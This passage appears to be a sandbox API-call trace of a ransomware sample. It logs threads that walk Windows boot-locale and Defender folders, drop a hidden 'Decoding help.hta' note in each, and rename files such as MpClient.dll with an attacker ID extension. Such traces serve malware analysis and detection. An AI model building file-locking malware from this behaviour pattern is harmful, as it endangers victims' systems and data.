returned="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" [0039.634] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.634] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.634] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 88 os_tid = 0xb94 [0039.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*.*", lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.635] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.635] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.635] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.635] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\zh-HK\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\*.*") returned="\\\\?\\C:\\Boot\\zh-HK\\*.*" [0039.635] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-HK\\*.*") returned 21 [0039.635] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\zh-HK\\Decoding help.hta" [0039.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\Decoding help.hta" (normalized: "c:\\boot\\zh-hk\\decoding help.hta")) returned 0xffffffff [0039.635] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\Decoding help.hta" (normalized: "c:\\boot\\zh-hk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.635] WriteFile (in: hFile=0x134, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8a4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8a4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.636] CloseHandle (hObject=0x134) returned 1 [0039.636] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.637] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.637] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.637] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\zh-HK\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\*.*") returned="\\\\?\\C:\\Boot\\zh-HK\\*.*" [0039.637] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-HK\\*.*") returned 21 [0039.637] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" [0039.637] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" [0039.637] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.637] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.637] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 89 os_tid = 0xb98 [0039.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*.*", lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55b0 [0039.930] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.930] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.932] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.932] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.932] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.932] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\zh-TW\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\*.*") returned="\\\\?\\C:\\Boot\\zh-TW\\*.*" [0039.932] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-TW\\*.*") returned 21 [0039.932] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\zh-TW\\Decoding help.hta" [0039.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\Decoding help.hta" (normalized: "c:\\boot\\zh-tw\\decoding help.hta")) returned 0xffffffff [0039.932] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\Decoding help.hta" (normalized: "c:\\boot\\zh-tw\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0039.933] WriteFile (in: hFile=0x220, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8b8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8b8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.933] CloseHandle (hObject=0x220) returned 1 [0039.934] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.934] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.934] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.934] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\zh-TW\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\*.*") returned="\\\\?\\C:\\Boot\\zh-TW\\*.*" [0039.934] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-TW\\*.*") returned 21 [0039.934] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" [0039.934] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" [0039.934] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.934] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.934] FindClose (in: hFindFile=0x5a55b0 | out: hFindFile=0x5a55b0) returned 1 Thread: id = 90 os_tid = 0xb9c [0039.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Uninstall Information\\*.*", lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.639] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.639] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.639] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0039.639] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 91 os_tid = 0xba0 [0039.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\*.*", lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.649] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.649] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.649] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.649] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23376857, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.649] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.649] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.649] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.649] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.649] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US" [0039.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0039.649] GlobalMemoryStatus (in: lpBuffer=0x8e0fd10 | out: lpBuffer=0x8e0fd10) [0039.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ee8db0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.665] CloseHandle (hObject=0x1e0) returned 1 [0039.665] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150a97a1, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x150a97a1, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x33b368d0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpAsDesc.dll", cAlternateFileName="")) returned 1 [0039.665] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.665] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.665] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.665] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0xffffffff [0039.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.665] WriteFile (in: hFile=0x1e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8e0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8e0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.666] CloseHandle (hObject=0x1e0) returned 1 [0039.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.667] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpAsDesc.dll") returned -1 [0039.667] lstrlenW (lpString="MpAsDesc.dll") returned 12 [0039.667] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.667] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.667] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpAsDesc.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll" [0039.667] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll" [0039.667] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll" (normalized: "c:\\program files\\windows defender\\mpasdesc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpasdesc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.690] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a1a0776, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x2a1a0776, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x33bf4fb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x8ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpClient.dll", cAlternateFileName="")) returned 1 [0039.690] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.690] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpClient.dll") returned -1 [0039.690] lstrlenW (lpString="MpClient.dll") returned 12 [0039.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpClient.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll" [0039.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll" [0039.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpclient.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.690] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7bb298, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x1f7bb298, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe86ec360, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpCmdRun.exe", cAlternateFileName="")) returned 1 [0039.690] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.691] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpCmdRun.exe") returned -1 [0039.691] lstrlenW 